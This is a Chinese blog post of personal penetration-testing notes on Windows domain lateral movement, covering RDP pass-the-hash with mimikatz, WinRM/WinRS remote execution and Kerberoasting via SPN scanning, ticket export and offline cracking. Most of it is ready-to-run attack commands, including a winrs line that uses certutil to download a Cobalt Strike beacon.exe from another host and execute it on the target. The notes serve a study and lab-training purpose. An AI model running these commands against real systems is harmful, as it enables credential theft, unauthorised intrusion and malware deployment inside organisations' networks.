8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS

这篇具有很好参考价值的文章主要介绍了8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

用途:个人学习笔记,有所借鉴,欢迎指正

目录

一、域横向移动-RDP-明文&NTLM

1.探针服务:

2.探针连接:

3.连接执行:

二、域横向移动-WinRM&WinRS-明文&NTLM

1.探针可用:

2.连接执行:

3.上线 CS&MSF:

4.CS 内置横向移动

三、域横向移动-Spn&Kerberos-请求&破解&重写

Kerberoasting攻击的利用:


一、域横向移动-RDP-明文&NTLM

RDP连接:
1、直接在当前被控主机上进行远程连接
2、建立节点进行连接
3、端口的转发(当前2222去访问目标的3389) ——  访问被控2222

8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS,内网安全/渗透,网络安全,内网渗透,横向移动,网络协议,网络攻击模型

远程桌面服务 支持明文及 HASH 连接
条件:双方开启 RDP 服务 远程桌面

1.探针服务:

cs 内置端口扫描 3389
tasklist /svc | find "TermService"      # 找到对应服务进程的 PID
netstat -ano | find "PID "              # 找到进程对应的端口号

2.探针连接:

CrackMapExec&MSF 批扫用户名密码验证
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket-CSDN博客

3.连接执行:

明文连接:
mstsc /console /v:192.168.3.32 /admin
HASH 连接:
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"

二、域横向移动-WinRM&WinRS-明文&NTLM

WinRM 代表 Windows 远程管理,是一种允许管理员远程执行系统管理任务的服务。
默认情况下支持 Kerberos NTLM 身份验证以及基本身份验证。
移动条件:双方都启用的 Winrm rs 的服务!
使用此服务需要管理员级别凭据。
Windows 2008 以上版本默认自动状态, Windows Vista/win7 上必须手动启动;
Windows 2012 之后的版本默认允许远程任意主机来管理。
攻击机开启:
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}

1.探针可用:

cs 内置端口扫描 5985
powershell Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

2.连接执行:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami

3.上线 CS&MSF:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe beacon.exe & beacon.exe"

4.CS 内置横向移动

8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS,内网安全/渗透,网络安全,内网渗透,横向移动,网络协议,网络攻击模型

三、域横向移动-Spn&Kerberos-请求&破解&重写

应用背景:在得不到正确密码明文值或哈希值的情况下,实现横向移动。

资源:

https://github.com/GhostPack/Rubeus
https://github.com/nidem/kerberoast
https://www.freebuf.com/articles/system/174967.html

Kerberoasting攻击的利用:

•SPN服务发现
•请求服务票据
•服务票据的导出
•服务票据的暴力破解

如需利用需要配置策略加密方式(对比)
黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个
目标服务的服务票证。
DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能验证用
户是否可以访问。
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码
哈希用于加密服务票证。 

黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为
Kerberoast攻击。
如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值
就将用于创建服务票证。

Kerberoast攻击条件:
采用rc4加密类型票据,工具Rubeus检测或看票据加密类型

1.扫描:

powershell setspn -T 0day.org -q */*
powershell setspn -T 0day.org -q */* | findstr "MSSQL"

2.检测:

Rubeus kerberoast

3.请求:

powershell Add-Type -AssemblyName System.IdentityModel

powershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/Srv-DB-0day.0day.org:1433"

mimikatz kerberos::ask /target:MSSQLSvc/Sqlserver.god.org:1433

4.查看和导出票据:

查看票据:klist
导出:
mimikatz kerberos::list /export

5.破解:

python tgsreporack.py pass.txt "1-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi"

6.重写:

https://www.freebuf.com/articles/system/174967.html文章来源地址https://www.toymoban.com/news/detail-825503.html

到了这里,关于8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【内网安全-横向移动】IPC$连接--->计划任务--->上线

    目录 一、信息收集(目标用户密码) 1、简述 1、收集信息充当字典 2、收集方法 二、横向移动 1、ipc$ 2、at命令 3、sc命令: 4、schtasks(计划任务) 三、利用示例 1、流程: 2、示例: 四、工具 1、cs插件---LSTAR - Aggressor 2、impacket-atexec 1、收集信息充当字典 1) 目标字典 :域内网

    2024年01月16日
    浏览(41)
  • 内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

    横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.( 传递攻击主

    2024年02月08日
    浏览(41)
  • 内网安全:WMI协议与SMB协议横向移动

    目录 网络拓扑图 网络环境说明 WMI协议 SMB协议 域内信息收集 WMI协议 - 横向移动 利用方式一:wmic命令 利用方式一:cscript 利用方式一:impacket SMB协议 - 横向移动 利用方式一:psexec 利用方式二:psexec.exe 利用方式三:CS插件 利用方式四:Impacket-smbexec 利用方式五:services 域横

    2024年02月11日
    浏览(52)
  • 【内网安全-横向移动】WMI-WMIC命令&相关内网工具

    目录 一、WMI 1、简述:  1)官方介绍: 2)优点: 3)条件: 4)不足: 5)WMIC管理命令: 6)相关工具:  2、上线: 1、wmic 2、impacket-wmiexec 3、wmicmd.exe 4、WMIHACKER  1)官方介绍: WMI 具有 管理员 和 WMI 提供 程序编写器 使用的多个命令行工具 WMI 命令行工具 - Win32 apps | Micros

    2024年01月22日
    浏览(50)
  • 6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket

      用途:个人学习笔记,有所借鉴,欢迎指正! 在内网环境中,主机192.168.3.31有外网网卡能出网,在取得该主机权限后上线,搭建web应用构造后门下载地址,利用该主机执行相关命令可以进行横向移动,通过传递命令其他主机也可访问下载主机192.168.3.31的后门并执行,从而拿

    2024年02月20日
    浏览(42)
  • 10、内网安全-横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝

    用途:个人学习笔记,有所借鉴,欢迎指正! 主要针对内网主机中的 域控提权 漏洞,包含漏洞探针和漏洞复现利用。 1、 横向移动-系统漏洞-CVE-2017-0146(ms17-010,永恒之蓝) 永恒之蓝(CVE-2017-0146)复现(超详细)_永恒之蓝模型-CSDN博客 2、 横向移动-域控提权-CVE-2014-6324 3、

    2024年02月21日
    浏览(35)
  • 传递攻击-横向移动

    目录 传递攻击-横向移动 一、哈希传递攻击(PTH) 二、哈希传递条件 三、哈希传递攻击步骤 四、密钥传递攻击(PTK) 五、KB2871997补丁 六、密钥传递攻击步骤 七、票据传递攻击(PTT) 八、票据传递攻击两种方式 九、票据传递攻击步骤 哈希传递攻击(Pass The Hash)是基于 N

    2024年02月08日
    浏览(36)
  • 域用户枚举和密码喷洒攻击横向移动

    目录 域用户枚举和密码喷洒攻击横向移动 一、域内用户枚举攻击原理 二、域内用户枚举工具 三、密码喷洒攻击原理 四、密码喷洒工具 正常域用户登录主机,我们可以通过 \\\"net user /domain\\\"来列举出域内的用户。但是当我们用非域用户进行登录时,是不能使用 \\\"net user /domain\\\"这

    2024年02月07日
    浏览(29)
  • 内网渗透-内置工具横向移动

    前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。 IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view

    2024年02月09日
    浏览(37)
  • 内网环境横向移动——利用DCOM(2)

    PTH 部分基于 NTLM 认证进行攻击,而 PTT 基于 kerberos 协议进行攻击 PTT 中最常见的三种攻击方式为:MS14-068、黄金票据、白银票据 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该

    2024年01月24日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包